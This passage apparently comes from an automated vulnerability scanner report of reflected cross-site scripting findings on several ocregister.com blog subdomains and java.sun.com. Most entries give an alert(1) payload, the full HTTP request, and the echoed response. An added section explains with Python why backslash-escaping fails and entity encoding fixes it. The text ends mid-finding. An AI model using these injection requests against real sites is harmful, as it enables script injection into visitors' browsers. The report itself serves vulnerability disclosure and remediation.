The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f25b3"><script>alert(1)</script>e5fb01ad94c was submitted in the REST URL parameter 5. This input was echoed as f25b3\"><script>alert(1)</script>e5fb01ad94c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3"><script>alert(1)</script>e5fb01ad94c/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 70357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... k rel="alternate" type="application/rss+xml" title=" Page not found - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3\"><script>alert(1)</script>e5fb01ad94c/feed/" /> ...[SNIP]...
1.173. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f14"><script>alert(1)</script>e4a4ce6c848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f14\"><script>alert(1)</script>e4a4ce6c848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14"><script>alert(1)</script>e4a4ce6c848=1 HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" TV bride won more surgery than she knew - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14\"><script>alert(1)</script>e4a4ce6c848=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26 was submitted in the REST URL parameter 1. This input was echoed as 4966c"style="x:expression(alert(1))"f842afe3d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on CSS expressions, which are specific to Internet Explorer (later versions dropped support in standards mode) and do not work in other browsers; a conventional attribute break-out payload would be needed to confirm the issue elsewhere.
Request
GET /4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 03 Feb 2011 16:20:10 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sun Microsystems</title> <!-- BEGIN METADATA --> <meta http-equiv="content-type" content="text/html; charse ...[SNIP]... <a href="/contact/feedback.jsp? referer=http://java.sun.com/notfound.jsp &requrl=http://java.sun.com/4966c"style="x:expression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab &refurl=http://java.sun.com/UserTypedUrl &category=se"> ...[SNIP]...
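Every WordPress issue in this report reflects the request URI into the href of the RSS `<link rel="alternate">` tag, and the `\"` in each echoed value shows that the only protection applied is backslash-escaping of quotes (the form PHP's addslashes() and magic quotes produce), which an HTML tokenizer ignores. The java.sun.com issue above lands in the same kind of attribute but stays inside the tag, adding a style attribute instead of breaking out. The following is an added example, not code from this report, from WordPress or from Sun: it reproduces the slash-escaped attribute with Python's standard-library html.parser, shows that both payload shapes become markup, and shows that entity-encoding for the attribute context neutralizes both. The host name, the tag layout and the add_slashes() helper are assumptions for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs shaped like the two payloads in this report.
BREAKOUT_PAYLOAD = '8adda"><script>alert(1)</script>15e0db13ad7'
STYLE_PAYLOAD = '4966c"style="x:expression(alert(1))"f842afe3d26'

BASE = "http://blog.example/"  # assumed host; the report's hosts vary


def add_slashes(s: str) -> str:
    """SQL-style quote escaping, as PHP's addslashes()/magic quotes produce.
    This is what turns the payload's " into the \\" seen in the echoed values."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def feed_link_vulnerable(request_uri: str) -> str:
    """The <link rel="alternate"> tag built the way the vulnerable pages build it:
    slash-escape the request URI, then drop it into a double-quoted attribute."""
    return ('<link rel="alternate" type="application/rss+xml" href="'
            + BASE + add_slashes(request_uri) + 'feed/" />')


def feed_link_fixed(request_uri: str) -> str:
    """Same tag with encoding that matches the output context: HTML entity
    encoding for an attribute value (quote=True also encodes " and ')."""
    return ('<link rel="alternate" type="application/rss+xml" href="'
            + BASE + html.escape(request_uri, quote=True) + 'feed/" />')


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, as a browser tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):  # the <... /> form
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def injected(markup: str) -> bool:
    """True unless the markup tokenizes to exactly one <link> carrying only the
    three attributes we wrote. An extra tag (<script>) or an extra attribute
    (style=...) both mean the input has become markup."""
    tags = parse_tags(markup)
    if len(tags) != 1:
        return True
    tag, attrs = tags[0]
    return tag != "link" or set(attrs) != {"rel", "type", "href"}


if __name__ == "__main__":
    for payload in (BREAKOUT_PAYLOAD, STYLE_PAYLOAD):
        print("slash-escaped :", injected(feed_link_vulnerable(payload)))  # True
        print("entity-encoded:", injected(feed_link_fixed(payload)))       # False
```

The check deliberately asks the tokenizer what it sees rather than grepping for `<script>`: the style-attribute payload never produces a new tag, and a string match would miss it. In WordPress terms the fix is the difference between echoing `$_SERVER['REQUEST_URI']` directly and passing it through `esc_url()` or `esc_attr()` first; backslash-escaping is an SQL convention and means nothing in HTML.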
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>1c47112440a was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8adda"><script>alert(1)</script>15e0db13ad7 was submitted in the REST URL parameter 5. This input was echoed as 8adda\"><script>alert(1)</script>15e0db13ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/142248adda"><script>alert(1)</script>15e0db13ad7/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda\"><script>alert(1)</script>15e0db13ad7/feed/" /> ...[SNIP]...
1.177. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7745"><script>alert(1)</script>ced09a70bf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7745\"><script>alert(1)</script>ced09a70bf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745"><script>alert(1)</script>ced09a70bf4=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... lication/rss+xml" title=" Oceanfront with killer views a deal? - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/?f7745\"><script>alert(1)</script>ced09a70bf4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f68e"><script>alert(1)</script>a746ad081d4 was submitted in the REST URL parameter 5. This input was echoed as 9f68e\"><script>alert(1)</script>a746ad081d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e"><script>alert(1)</script>a746ad081d4/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/140209f68e\"><script>alert(1)</script>a746ad081d4/feed/" /> ...[SNIP]...
1.179. http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 366d8"><script>alert(1)</script>65b84b53c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 366d8\"><script>alert(1)</script>65b84b53c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8"><script>alert(1)</script>65b84b53c1=1 HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... /rss+xml" title=" Laguna Beach home sales up 13% over year - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/?366d8\"><script>alert(1)</script>65b84b53c1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b73"><script>alert(1)</script>49eaba8a56a was submitted in the REST URL parameter 5. This input was echoed as 79b73\"><script>alert(1)</script>49eaba8a56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/9774079b73"><script>alert(1)</script>49eaba8a56a/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/9774079b73\"><script>alert(1)</script>49eaba8a56a/feed/" /> ...[SNIP]...
1.181. http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2156"><script>alert(1)</script>7f4f3a0d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2156\"><script>alert(1)</script>7f4f3a0d6f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156"><script>alert(1)</script>7f4f3a0d6f7=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/01/really-no-housing-slump-in-san-marino/97740/?c2156\"><script>alert(1)</script>7f4f3a0d6f7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9132"><script>alert(1)</script>89260b73642 was submitted in the REST URL parameter 5. This input was echoed as a9132\"><script>alert(1)</script>89260b73642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596a9132"><script>alert(1)</script>89260b73642/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596a9132\"><script>alert(1)</script>89260b73642/feed/" /> ...[SNIP]...
1.183. http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/02/a-new-home-for-kobe-bryant/97596/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa939"><script>alert(1)</script>23a10abfd00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa939\"><script>alert(1)</script>23a10abfd00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939"><script>alert(1)</script>23a10abfd00=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117579
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ternate" type="application/rss+xml" title=" A new home for Kobe Bryant? - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/a-new-home-for-kobe-bryant/97596/?fa939\"><script>alert(1)</script>23a10abfd00=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f3"><script>alert(1)</script>2d65ca2126c was submitted in the REST URL parameter 5. This input was echoed as ec6f3\"><script>alert(1)</script>2d65ca2126c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3"><script>alert(1)</script>2d65ca2126c/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52467
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070ec6f3\"><script>alert(1)</script>2d65ca2126c/feed/" /> ...[SNIP]...
1.185. http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e2a"><script>alert(1)</script>2f16017d2e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37e2a\"><script>alert(1)</script>2f16017d2e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a"><script>alert(1)</script>2f16017d2e8=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... application/rss+xml" title=" Homebuilding slump now 3 years old - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/02/homebuilding-slump-now-3-years-old/98070/?37e2a\"><script>alert(1)</script>2f16017d2e8=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de683"><script>alert(1)</script>9b3add21ddf was submitted in the REST URL parameter 5. This input was echoed as de683\"><script>alert(1)</script>9b3add21ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182de683"><script>alert(1)</script>9b3add21ddf/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182de683\"><script>alert(1)</script>9b3add21ddf/feed/" /> ...[SNIP]...
1.187. http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/2011/02/03/orange-county-property/98182/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abaf"><script>alert(1)</script>e1b7c34c143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abaf\"><script>alert(1)</script>e1b7c34c143 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/orange-county-property/98182/?6abaf"><script>alert(1)</script>e1b7c34c143=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98182>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... pe="application/rss+xml" title=" 5th straight jump for O.C. property index - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/2011/02/03/orange-county-property/98182/?6abaf\"><script>alert(1)</script>e1b7c34c143=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969aa"><script>alert(1)</script>21e3c1a89f6 was submitted in the REST URL parameter 1. This input was echoed as 969aa\"><script>alert(1)</script>21e3c1a89f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category969aa"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category969aa\"><script>alert(1)</script>21e3c1a89f6/outlooks/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35fdf"><script>alert(1)</script>012deb55675 was submitted in the REST URL parameter 2. This input was echoed as 35fdf\"><script>alert(1)</script>012deb55675 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks35fdf"><script>alert(1)</script>012deb55675/eyeball-11/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
